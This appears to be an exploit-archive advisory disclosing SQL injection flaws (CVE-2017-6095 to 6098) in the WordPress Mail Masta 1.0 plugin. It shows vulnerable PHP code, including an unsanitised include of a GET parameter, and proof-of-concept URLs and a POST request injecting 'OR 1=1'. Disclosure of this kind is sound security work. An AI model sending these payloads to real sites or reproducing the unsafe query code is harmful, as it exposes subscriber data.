WordPress Mail Masta 1.0 SQL Injection

2017.02.24

Credit: Hanley Shun

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2017-6098

CWE: CWE-89

CVSS Base Score: 6.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8/10

Exploit range: Remote

Attack complexity: Low

Authentication: Single time

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

# Exploit Title: Multiple SQL injection vulnerabilities in Mail Masta (aka mail-masta) plugin 1.0 for Wordpress.
# Date: 02/18/2017
# Exploit Author: Hanley Shun
# Vendor Homepage: https://github.com/hamkovic/
# Software Link: https://www.exploit-db.com/apps/78745b48b15bf2b81153556ef1c8ec48-mail-masta.zip
# Version: 1.0
# Tested on: Kali Linux x64, Ubuntu 14.04 x64
# CVE : [CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098]
 
 
Mail-Masta SQL Injection
 
Page: ./wp-content/plugins/mail-masta/inc/lists/csvexport.php (Unauthenticated)
 
GET Parameter: list_id
 
http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php
 
 
csvexport.php:
 
$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);
 
 
Page: ./wp-content/plugins/mail-masta/inc/lists/view-list.php (Requires Wordpress admin)
 
GET Parameter: filter_list
 
http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1
 
 
view-list.php:
 
global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));
 
 
Page: ./wp-content/plugins/mail-masta/inc/campaign/count_of_send.php (Requires Wordpress admin)
 
POST Parameter: camp_id
 
http://my_wp_app/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=/var/www/html/wordpress/wp-load.php
 
 
count_of_send.php:
 
include($_GET['pl']);
global $wpdb;
$camp_id=$_POST['camp_id'];
$masta_reports = $wpdb->prefix . "masta_reports";
$count=$wpdb->get_results("SELECT count(*) co from  $masta_reports where camp_id=$camp_id and status=1");
 
 
Page: ./wp-content/plugins/mail-masta/inc/campaign_save.php (Requires Wordpress admin)
 
POST Parameter: list_id
 
campaign_save.php:
 
$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");
 
 
POST /wp-admin/admin-ajax.php?id= HTTP/1.1
 
...snip...
 
action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress Mail Masta 1.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.